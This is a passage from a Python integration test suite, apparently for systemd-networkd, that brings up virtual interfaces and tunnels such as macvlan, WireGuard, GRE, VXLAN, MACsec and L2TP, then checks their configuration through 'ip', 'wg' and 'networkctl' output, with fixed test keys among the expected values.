self.assertRegex(output, 'inet 192.168.23.5/24 brd 192.168.23.255 scope global vlan99')
def test_macvtap(self):
for mode in ['private', 'vepa', 'bridge', 'passthru']:
with self.subTest(mode=mode):
if mode != 'private':
self.tearDown()
copy_unit_to_networkd_unit_path('21-macvtap.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'macvtap.network')
with open(os.path.join(network_unit_file_path, '21-macvtap.netdev'), mode='a') as f:
f.write('[MACVTAP]\nMode=' + mode)
start_networkd()
self.wait_online(['macvtap99:degraded', 'test1:degraded'])
output = check_output('ip -d link show macvtap99')
print(output)
self.assertRegex(output, 'macvtap mode ' + mode + ' ')
def test_macvlan(self):
for mode in ['private', 'vepa', 'bridge', 'passthru']:
with self.subTest(mode=mode):
if mode != 'private':
self.tearDown()
copy_unit_to_networkd_unit_path('21-macvlan.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'macvlan.network')
with open(os.path.join(network_unit_file_path, '21-macvlan.netdev'), mode='a') as f:
f.write('[MACVLAN]\nMode=' + mode)
start_networkd()
self.wait_online(['macvlan99:degraded', 'test1:degraded'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, ' mtu 2000 ')
output = check_output('ip -d link show macvlan99')
print(output)
self.assertRegex(output, ' mtu 2000 ')
self.assertRegex(output, 'macvlan mode ' + mode + ' ')
@expectedFailureIfModuleIsNotAvailable('ipvlan')
def test_ipvlan(self):
for mode, flag in [['L2', 'private'], ['L3', 'vepa'], ['L3S', 'bridge']]:
with self.subTest(mode=mode, flag=flag):
if mode != 'L2':
self.tearDown()
copy_unit_to_networkd_unit_path('25-ipvlan.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'ipvlan.network')
with open(os.path.join(network_unit_file_path, '25-ipvlan.netdev'), mode='a') as f:
f.write('[IPVLAN]\nMode=' + mode + '\nFlags=' + flag)
start_networkd()
self.wait_online(['ipvlan99:degraded', 'test1:degraded'])
output = check_output('ip -d link show ipvlan99')
print(output)
self.assertRegex(output, 'ipvlan *mode ' + mode.lower() + ' ' + flag)
@expectedFailureIfModuleIsNotAvailable('ipvtap')
def test_ipvtap(self):
for mode, flag in [['L2', 'private'], ['L3', 'vepa'], ['L3S', 'bridge']]:
with self.subTest(mode=mode, flag=flag):
if mode != 'L2':
self.tearDown()
copy_unit_to_networkd_unit_path('25-ipvtap.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'ipvtap.network')
with open(os.path.join(network_unit_file_path, '25-ipvtap.netdev'), mode='a') as f:
f.write('[IPVTAP]\nMode=' + mode + '\nFlags=' + flag)
start_networkd()
self.wait_online(['ipvtap99:degraded', 'test1:degraded'])
output = check_output('ip -d link show ipvtap99')
print(output)
self.assertRegex(output, 'ipvtap *mode ' + mode.lower() + ' ' + flag)
def test_veth(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['veth99:degraded', 'veth-peer:degraded'])
output = check_output('ip -d link show veth99')
print(output)
self.assertRegex(output, 'link/ether 12:34:56:78:9a:bc')
output = check_output('ip -d link show veth-peer')
print(output)
self.assertRegex(output, 'link/ether 12:34:56:78:9a:bd')
    def test_tun(self):
        """A Tun netdev is created with pi/vnet_hdr/multi_queue and stays unmanaged."""
        copy_unit_to_networkd_unit_path('25-tun.netdev')
        start_networkd()
        self.wait_online(['tun99:off'], setup_state='unmanaged')
        output = check_output('ip -d link show tun99')
        print(output)
        # Old ip command does not support IFF_ flags
        self.assertRegex(output, 'tun (type tun pi on vnet_hdr on multi_queue|addrgenmode) ')
    def test_tap(self):
        """A Tap netdev is created with pi/vnet_hdr/multi_queue and stays unmanaged."""
        copy_unit_to_networkd_unit_path('25-tap.netdev')
        start_networkd()
        self.wait_online(['tap99:off'], setup_state='unmanaged')
        output = check_output('ip -d link show tap99')
        print(output)
        # Old ip command does not support IFF_ flags
        self.assertRegex(output, 'tun (type tap pi on vnet_hdr on multi_queue|addrgenmode) ')
    @expectedFailureIfModuleIsNotAvailable('vrf')
    def test_vrf(self):
        """A Vrf netdev with link-local addressing reaches the 'carrier' state."""
        copy_unit_to_networkd_unit_path('25-vrf.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['vrf99:carrier'])
    @expectedFailureIfModuleIsNotAvailable('vcan')
    def test_vcan(self):
        """A virtual CAN netdev reaches the 'carrier' state."""
        copy_unit_to_networkd_unit_path('25-vcan.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['vcan99:carrier'])
    @expectedFailureIfModuleIsNotAvailable('vxcan')
    def test_vxcan(self):
        """Both ends of a vxcan pair reach the 'carrier' state."""
        copy_unit_to_networkd_unit_path('25-vxcan.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['vxcan99:carrier', 'vxcan-peer:carrier'])
    @expectedFailureIfModuleIsNotAvailable('wireguard')
    def test_wireguard(self):
        """WireGuard netdevs come up with keys, peers, endpoints and fwmark applied.

        The detailed checks need the 'wg' userspace tool; when it is missing,
        only the links coming online is verified.
        """
        copy_unit_to_networkd_unit_path('25-wireguard.netdev', '25-wireguard.network',
                                        '25-wireguard-23-peers.netdev', '25-wireguard-23-peers.network',
                                        '25-wireguard-preshared-key.txt', '25-wireguard-private-key.txt')
        start_networkd()
        self.wait_online(['wg99:carrier', 'wg98:routable'])
        # 'wg' may be absent on minimal test images; skip detailed checks then.
        if shutil.which('wg'):
            call('wg')
            # Each 'wg show' sub-command is checked against the value
            # configured in the corresponding unit/key file.
            output = check_output('wg show wg99 listen-port')
            self.assertRegex(output, '51820')
            output = check_output('wg show wg99 fwmark')
            self.assertRegex(output, '0x4d2')
            output = check_output('wg show wg99 allowed-ips')
            self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t192.168.26.0/24 fd31:bf08:57cb::/48')
            self.assertRegex(output, r'lsDtM3AbjxNlauRKzHEPfgS1Zp7cp/VX5Use/P4PQSc=\tfdbc:bae2:7871:e1fe:793:8636::/96 fdbc:bae2:7871:500:e1fe:793:8636:dad1/128')
            output = check_output('wg show wg99 persistent-keepalive')
            self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t20')
            output = check_output('wg show wg99 endpoints')
            self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t192.168.27.3:51820')
            output = check_output('wg show wg99 private-key')
            self.assertRegex(output, r'EEGlnEPYJV//kbvvIqxKkQwOiS\+UENyPncC4bF46ong=')
            output = check_output('wg show wg99 preshared-keys')
            self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA= IIWIV17wutHv7t4cR6pOT91z6NSz/T8Arh0yaywhw3M=')
            self.assertRegex(output, r'lsDtM3AbjxNlauRKzHEPfgS1Zp7cp/VX5Use/P4PQSc= cPLOy1YUrEI0EMMIycPJmOo0aTu3RZnw8bL5meVD6m0=')
            output = check_output('wg show wg98 private-key')
            self.assertRegex(output, r'CJQUtcS9emY2fLYqDlpSZiE/QJyHkPWr\+WHtZLZ90FU=')
def test_geneve(self):
copy_unit_to_networkd_unit_path('25-geneve.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['geneve99:degraded'])
output = check_output('ip -d link show geneve99')
print(output)
self.assertRegex(output, '192.168.22.1')
self.assertRegex(output, '6082')
self.assertRegex(output, 'udpcsum')
self.assertRegex(output, 'udp6zerocsumrx')
def test_ipip_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ipip.network',
'25-ipip-tunnel.netdev', '25-tunnel.network',
'25-ipip-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ipip-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-ipip-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['ipiptun99:routable', 'ipiptun98:routable', 'ipiptun97:routable', 'ipiptun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ipiptun99')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote 192.169.224.239 local 192.168.223.238 dev dummy98')
output = check_output('ip -d link show ipiptun98')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote 192.169.224.239 local any dev dummy98')
output = check_output('ip -d link show ipiptun97')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote any local 192.168.223.238 dev dummy98')
output = check_output('ip -d link show ipiptun96')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote any local any dev dummy98')
def test_gre_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'gretun.network',
'25-gre-tunnel.netdev', '25-tunnel.network',
'25-gre-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-gre-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-gre-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['gretun99:routable', 'gretun98:routable', 'gretun97:routable', 'gretun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show gretun99')
print(output)
self.assertRegex(output, 'gre remote 10.65.223.239 local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 1.2.3.103')
self.assertRegex(output, 'okey 1.2.4.103')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show gretun98')
print(output)
self.assertRegex(output, 'gre remote 10.65.223.239 local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.104')
self.assertRegex(output, 'okey 0.0.0.104')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
output = check_output('ip -d link show gretun97')
print(output)
self.assertRegex(output, 'gre remote any local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.105')
self.assertRegex(output, 'okey 0.0.0.105')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
output = check_output('ip -d link show gretun96')
print(output)
self.assertRegex(output, 'gre remote any local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.106')
self.assertRegex(output, 'okey 0.0.0.106')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
def test_ip6gre_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6gretun.network',
'25-ip6gre-tunnel.netdev', '25-tunnel.network',
'25-ip6gre-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ip6gre-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-ip6gre-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd(5)
# Old kernels seem not to support IPv6LL address on ip6gre tunnel, So please do not use wait_online() here.
self.check_link_exists('dummy98')
self.check_link_exists('ip6gretun99')
self.check_link_exists('ip6gretun98')
self.check_link_exists('ip6gretun97')
self.check_link_exists('ip6gretun96')
output = check_output('ip -d link show ip6gretun99')
print(output)
self.assertRegex(output, 'ip6gre remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretun98')
print(output)
self.assertRegex(output, 'ip6gre remote 2001:473:fece:cafe::5179 local any dev dummy98')
output = check_output('ip -d link show ip6gretun97')
print(output)
self.assertRegex(output, 'ip6gre remote any local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretun96')
print(output)
self.assertRegex(output, 'ip6gre remote any local any dev dummy98')
def test_gretap_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'gretap.network',
'25-gretap-tunnel.netdev', '25-tunnel.network',
'25-gretap-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['gretap99:routable', 'gretap98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show gretap99')
print(output)
self.assertRegex(output, 'gretap remote 10.65.223.239 local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.106')
self.assertRegex(output, 'okey 0.0.0.106')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show gretap98')
print(output)
self.assertRegex(output, 'gretap remote 10.65.223.239 local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.107')
self.assertRegex(output, 'okey 0.0.0.107')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
def test_ip6gretap_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6gretap.network',
'25-ip6gretap-tunnel.netdev', '25-tunnel.network',
'25-ip6gretap-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['ip6gretap99:routable', 'ip6gretap98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ip6gretap99')
print(output)
self.assertRegex(output, 'ip6gretap remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretap98')
print(output)
self.assertRegex(output, 'ip6gretap remote 2001:473:fece:cafe::5179 local any dev dummy98')
def test_vti_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'vti.network',
'25-vti-tunnel.netdev', '25-tunnel.network',
'25-vti-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-vti-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-vti-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['vtitun99:routable', 'vtitun98:routable', 'vtitun97:routable', 'vtitun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show vtitun99')
print(output)
self.assertRegex(output, 'vti remote 10.65.223.239 local 10.65.223.238 dev dummy98')
output = check_output('ip -d link show vtitun98')
print(output)
self.assertRegex(output, 'vti remote 10.65.223.239 local any dev dummy98')
output = check_output('ip -d link show vtitun97')
print(output)
self.assertRegex(output, 'vti remote any local 10.65.223.238 dev dummy98')
output = check_output('ip -d link show vtitun96')
print(output)
self.assertRegex(output, 'vti remote any local any dev dummy98')
def test_vti6_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'vti6.network',
'25-vti6-tunnel.netdev', '25-tunnel.network',
'25-vti6-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-vti6-tunnel-remote-any.netdev', '25-tunnel-remote-any.network')
start_networkd()
self.wait_online(['vti6tun99:routable', 'vti6tun98:routable', 'vti6tun97:routable', 'dummy98:degraded'])
output = check_output('ip -d link show vti6tun99')
print(output)
self.assertRegex(output, 'vti6 remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show vti6tun98')
print(output)
self.assertRegex(output, 'vti6 remote 2001:473:fece:cafe::5179 local (any|::) dev dummy98')
output = check_output('ip -d link show vti6tun97')
print(output)
self.assertRegex(output, 'vti6 remote (any|::) local 2a00:ffde:4567:edde::4987 dev dummy98')
def test_ip6tnl_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6tnl.network',
'25-ip6tnl-tunnel.netdev', '25-tunnel.network',
'25-ip6tnl-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ip6tnl-tunnel-remote-any.netdev', '25-tunnel-remote-any.network')
start_networkd()
self.wait_online(['ip6tnl99:routable', 'ip6tnl98:routable', 'ip6tnl97:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ip6tnl99')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6tnl98')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote 2001:473:fece:cafe::5179 local (any|::) dev dummy98')
output = check_output('ip -d link show ip6tnl97')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote (any|::) local 2a00:ffde:4567:edde::4987 dev dummy98')
def test_sit_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'sit.network',
'25-sit-tunnel.netdev', '25-tunnel.network',
'25-sit-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-sit-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-sit-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['sittun99:routable', 'sittun98:routable', 'sittun97:routable', 'sittun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show sittun99')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote 10.65.223.239 local 10.65.223.238 dev dummy98")
output = check_output('ip -d link show sittun98')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote 10.65.223.239 local any dev dummy98")
output = check_output('ip -d link show sittun97')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote any local 10.65.223.238 dev dummy98")
output = check_output('ip -d link show sittun96')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote any local any dev dummy98")
    def test_isatap_tunnel(self):
        """An ISATAP tunnel over dummy98 becomes routable and shows up as 'isatap'."""
        copy_unit_to_networkd_unit_path('12-dummy.netdev', 'isatap.network',
                                        '25-isatap-tunnel.netdev', '25-tunnel.network')
        start_networkd()
        self.wait_online(['isataptun99:routable', 'dummy98:degraded'])
        output = check_output('ip -d link show isataptun99')
        print(output)
        self.assertRegex(output, "isatap ")
    def test_6rd_tunnel(self):
        """A 6rd (sit) tunnel becomes routable with the configured 6rd prefix."""
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '6rd.network',
                                        '25-6rd-tunnel.netdev', '25-tunnel.network')
        start_networkd()
        self.wait_online(['sittun99:routable', 'dummy98:degraded'])
        output = check_output('ip -d link show sittun99')
        print(output)
        self.assertRegex(output, '6rd-prefix 2602::/24')
@expectedFailureIfERSPANModuleIsNotAvailable()
def test_erspan_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'erspan.network',
'25-erspan-tunnel.netdev', '25-tunnel.network',
'25-erspan-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['erspan99:routable', 'erspan98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show erspan99')
print(output)
self.assertRegex(output, 'erspan remote 172.16.1.100 local 172.16.1.200')
self.assertRegex(output, 'ikey 0.0.0.101')
self.assertRegex(output, 'okey 0.0.0.101')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show erspan98')
print(output)
self.assertRegex(output, 'erspan remote 172.16.1.100 local any')
self.assertRegex(output, '102')
self.assertRegex(output, 'ikey 0.0.0.102')
self.assertRegex(output, 'okey 0.0.0.102')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
    def test_tunnel_independent(self):
        """A tunnel with Independent=yes (no underlying device) reaches 'carrier'."""
        copy_unit_to_networkd_unit_path('25-ipip-tunnel-independent.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['ipiptun99:carrier'])
    def test_tunnel_independent_loopback(self):
        """An independent tunnel bound to the loopback device reaches 'carrier'."""
        copy_unit_to_networkd_unit_path('25-ipip-tunnel-independent-loopback.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['ipiptun99:carrier'])
    @expectedFailureIfModuleIsNotAvailable('xfrm_interface')
    def test_xfrm(self):
        """An xfrm interface on top of dummy98 comes up with link-local addressing."""
        copy_unit_to_networkd_unit_path('12-dummy.netdev', 'xfrm.network',
                                        '25-xfrm.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['xfrm99:degraded', 'dummy98:degraded'])
        # Output is printed for debugging only; no assertions are made on it.
        output = check_output('ip link show dev xfrm99')
        print(output)
    @expectedFailureIfModuleIsNotAvailable('xfrm_interface')
    def test_xfrm_independent(self):
        """An xfrm interface with Independent=yes comes up without an underlying device."""
        copy_unit_to_networkd_unit_path('25-xfrm-independent.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['xfrm99:degraded'])
@expectedFailureIfModuleIsNotAvailable('fou')
def test_fou(self):
# The following redundant check is necessary for CentOS CI.
# Maybe, error handling in lookup_id() in sd-netlink/generic-netlink.c needs to be updated.
self.assertTrue(is_module_available('fou'))
copy_unit_to_networkd_unit_path('25-fou-ipproto-ipip.netdev', '25-fou-ipproto-gre.netdev',
'25-fou-ipip.netdev', '25-fou-sit.netdev',
'25-fou-gre.netdev', '25-fou-gretap.netdev')
start_networkd()
self.wait_online(['ipiptun96:off', 'sittun96:off', 'gretun96:off', 'gretap96:off'], setup_state='unmanaged')
output = check_output('ip fou show')
print(output)
self.assertRegex(output, 'port 55555 ipproto 4')
self.assertRegex(output, 'port 55556 ipproto 47')
output = check_output('ip -d link show ipiptun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55555')
output = check_output('ip -d link show sittun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55555')
output = check_output('ip -d link show gretun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport 1001 encap-dport 55556')
output = check_output('ip -d link show gretap96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55556')
def test_vxlan(self):
copy_unit_to_networkd_unit_path('25-vxlan.netdev', 'vxlan.network',
'11-dummy.netdev', 'vxlan-test1.network')
start_networkd()
self.wait_online(['test1:degraded', 'vxlan99:degraded'])
output = check_output('ip -d link show vxlan99')
print(output)
self.assertRegex(output, '999')
self.assertRegex(output, '5555')
self.assertRegex(output, 'l2miss')
self.assertRegex(output, 'l3miss')
self.assertRegex(output, 'udpcsum')
self.assertRegex(output, 'udp6zerocsumtx')
self.assertRegex(output, 'udp6zerocsumrx')
self.assertRegex(output, 'remcsumtx')
self.assertRegex(output, 'remcsumrx')
self.assertRegex(output, 'gbp')
output = check_output('bridge fdb show dev vxlan99')
print(output)
self.assertRegex(output, '00:11:22:33:44:55 dst 10.0.0.5 self permanent')
self.assertRegex(output, '00:11:22:33:44:66 dst 10.0.0.6 self permanent')
self.assertRegex(output, '00:11:22:33:44:77 dst 10.0.0.7 self permanent')
output = check_output(*networkctl_cmd, 'status', 'vxlan99', env=env)
print(output)
self.assertRegex(output, 'VNI: 999')
self.assertRegex(output, 'Destination Port: 5555')
self.assertRegex(output, 'Underlying Device: test1')
    def test_macsec(self):
        """A MACsec link on dummy98 must be configured with the TX/RX channels
        and keys from 25-macsec.netdev/.key, with per-SA on/off state applied."""
        copy_unit_to_networkd_unit_path('25-macsec.netdev', '25-macsec.network', '25-macsec.key',
                                        'macsec.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:degraded', 'macsec99:routable'])
        output = check_output('ip -d link show macsec99')
        print(output)
        self.assertRegex(output, 'macsec99@dummy98')
        self.assertRegex(output, 'macsec sci [0-9a-f]*000b')
        self.assertRegex(output, 'encrypt on')
        output = check_output('ip macsec show macsec99')
        print(output)
        self.assertRegex(output, 'encrypt on')
        # Transmit secure channel with two SAs, both enabled.
        self.assertRegex(output, 'TXSC: [0-9a-f]*000b on SA 1')
        self.assertRegex(output, '0: PN [0-9]*, state on, key 01000000000000000000000000000000')
        self.assertRegex(output, '1: PN [0-9]*, state on, key 02030000000000000000000000000000')
        # First receive channel: SAs 0/1 on, 2/3 off; the malformed key from
        # the unit file must not have been installed.
        self.assertRegex(output, 'RXSC: c619528fe6a00100, state on')
        self.assertRegex(output, '0: PN [0-9]*, state on, key 02030405000000000000000000000000')
        self.assertRegex(output, '1: PN [0-9]*, state on, key 02030405060000000000000000000000')
        self.assertRegex(output, '2: PN [0-9]*, state off, key 02030405060700000000000000000000')
        self.assertRegex(output, '3: PN [0-9]*, state off, key 02030405060708000000000000000000')
        self.assertNotRegex(output, 'key 02030405067080900000000000000000')
        # Second receive channel with a single disabled SA.
        self.assertRegex(output, 'RXSC: 8c16456c83a90002, state on')
        self.assertRegex(output, '0: PN [0-9]*, state off, key 02030400000000000000000000000000')
    def test_nlmon(self):
        """An nlmon (netlink monitor) netdev reaches the 'carrier' state."""
        copy_unit_to_networkd_unit_path('25-nlmon.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['nlmon99:carrier'])
    @expectedFailureIfModuleIsNotAvailable('ifb')
    def test_ifb(self):
        """An ifb (intermediate functional block) netdev comes up with link-local addressing."""
        copy_unit_to_networkd_unit_path('25-ifb.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['ifb99:degraded'])
class NetworkdL2TPTests(unittest.TestCase, Utilities):
    """Tests for L2TP tunnels and sessions managed by networkd."""

    # Links created by these tests; removed again during cleanup.
    links = [
        'l2tp-ses1',
        'l2tp-ses2',
        'l2tp-ses3',
        'l2tp-ses4',
        'test1']

    # Unit files copied into the networkd unit path by the tests.
    units = [
        '11-dummy.netdev',
        '25-l2tp-dummy.network',
        '25-l2tp.network',
        '25-l2tp-ip.netdev',
        '25-l2tp-udp.netdev']

    l2tp_tunnel_ids = ['10']

    def setUp(self):
        """Drop any leftover L2TP tunnels/links and stop networkd."""
        remove_l2tp_tunnels(self.l2tp_tunnel_ids)
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        """Clean up tunnels, links and copied units; stop networkd with logs."""
        remove_l2tp_tunnels(self.l2tp_tunnel_ids)
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def _check_session(self, session, peer_session, peer_tunnel, ifname):
        """Assert that one session of tunnel 10 has the expected peer and interface."""
        output = check_output('ip l2tp show session tid 10 session_id {}'.format(session))
        print(output)
        self.assertRegex(output, "Session {} in tunnel 10".format(session))
        self.assertRegex(output, "Peer session {}, tunnel {}".format(peer_session, peer_tunnel))
        self.assertRegex(output, "interface name: {}".format(ifname))

    @expectedFailureIfModuleIsNotAvailable('l2tp_eth')
    def test_l2tp_udp(self):
        """A UDP-encapsulated L2TP tunnel and its two sessions must be created."""
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '25-l2tp-dummy.network',
                                        '25-l2tp-udp.netdev', '25-l2tp.network')
        start_networkd()

        self.wait_online(['test1:routable', 'l2tp-ses1:degraded', 'l2tp-ses2:degraded'])

        output = check_output('ip l2tp show tunnel tunnel_id 10')
        print(output)
        for pattern in ("Tunnel 10, encap UDP",
                        "From 192.168.30.100 to 192.168.30.101",
                        "Peer tunnel 11",
                        "UDP source / dest ports: 3000/4000",
                        "UDP checksum: enabled"):
            self.assertRegex(output, pattern)

        self._check_session(15, 16, 11, 'l2tp-ses1')
        self._check_session(17, 18, 11, 'l2tp-ses2')

    @expectedFailureIfModuleIsNotAvailable('l2tp_ip')
    def test_l2tp_ip(self):
        """An IP-encapsulated L2TP tunnel and its two sessions must be created."""
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '25-l2tp-dummy.network',
                                        '25-l2tp-ip.netdev', '25-l2tp.network')
        start_networkd()

        self.wait_online(['test1:routable', 'l2tp-ses3:degraded', 'l2tp-ses4:degraded'])

        output = check_output('ip l2tp show tunnel tunnel_id 10')
        print(output)
        for pattern in ("Tunnel 10, encap IP",
                        "From 192.168.30.100 to 192.168.30.101",
                        "Peer tunnel 12"):
            self.assertRegex(output, pattern)

        self._check_session(25, 26, 12, 'l2tp-ses3')
        self._check_session(27, 28, 12, 'l2tp-ses4')
class NetworkdNetworkTests(unittest.TestCase, Utilities):
links = [
'bond199',
'dummy98',
'dummy99',
'gretun97',
'ip6gretun97',
'test1',
'veth99',
]
units = [
'11-dummy.netdev',
'12-dummy.netdev',
'23-active-slave.network',
'24-keep-configuration-static.network',
'24-search-domain.network',
'25-address-dad-veth-peer.network',
'25-address-dad-veth99.network',
'25-address-link-section.network',
'25-address-preferred-lifetime-zero.network',
'25-address-static.network',
'25-bind-carrier.network',
'25-bond-active-backup-slave.netdev',
'25-fibrule-invert.network',
'25-fibrule-port-range.network',
'25-gre-tunnel-remote-any.netdev',
'25-ip6gre-tunnel-remote-any.netdev',
'25-ipv6-address-label-section.network',
'25-link-local-addressing-no.network',
'25-link-local-addressing-yes.network',
'25-link-section-unmanaged.network',
'25-neighbor-section.network',
'25-neighbor-next.network',
'25-neighbor-ipv6.network',
'25-neighbor-ip-dummy.network',
'25-neighbor-ip.network',
'25-nexthop.network',
'25-qdisc-fq-codel.network',
'25-qdisc-netem-and-fqcodel.network',
'25-qdisc-tbf-and-sfq.network',
'25-route-ipv6-src.network',
'25-route-static.network',
'25-gateway-static.network',
'25-gateway-next-static.network',
'25-sysctl-disable-ipv6.network',
'25-sysctl.network',
'25-veth-peer.network',
'25-veth.netdev',
'26-link-local-addressing-ipv6.network',
'configure-without-carrier.network',
'routing-policy-rule-dummy98.network',
'routing-policy-rule-test1.network']
routing_policy_rule_tables = ['7', '8', '9']
routes = [['blackhole', '202.54.1.2'], ['unreachable', '202.54.1.3'], ['prohibit', '202.54.1.4']]
def setUp(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_routes(self.routes)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_routes(self.routes)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_address_static(self):
copy_unit_to_networkd_unit_path('25-address-static.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
# invalid sections
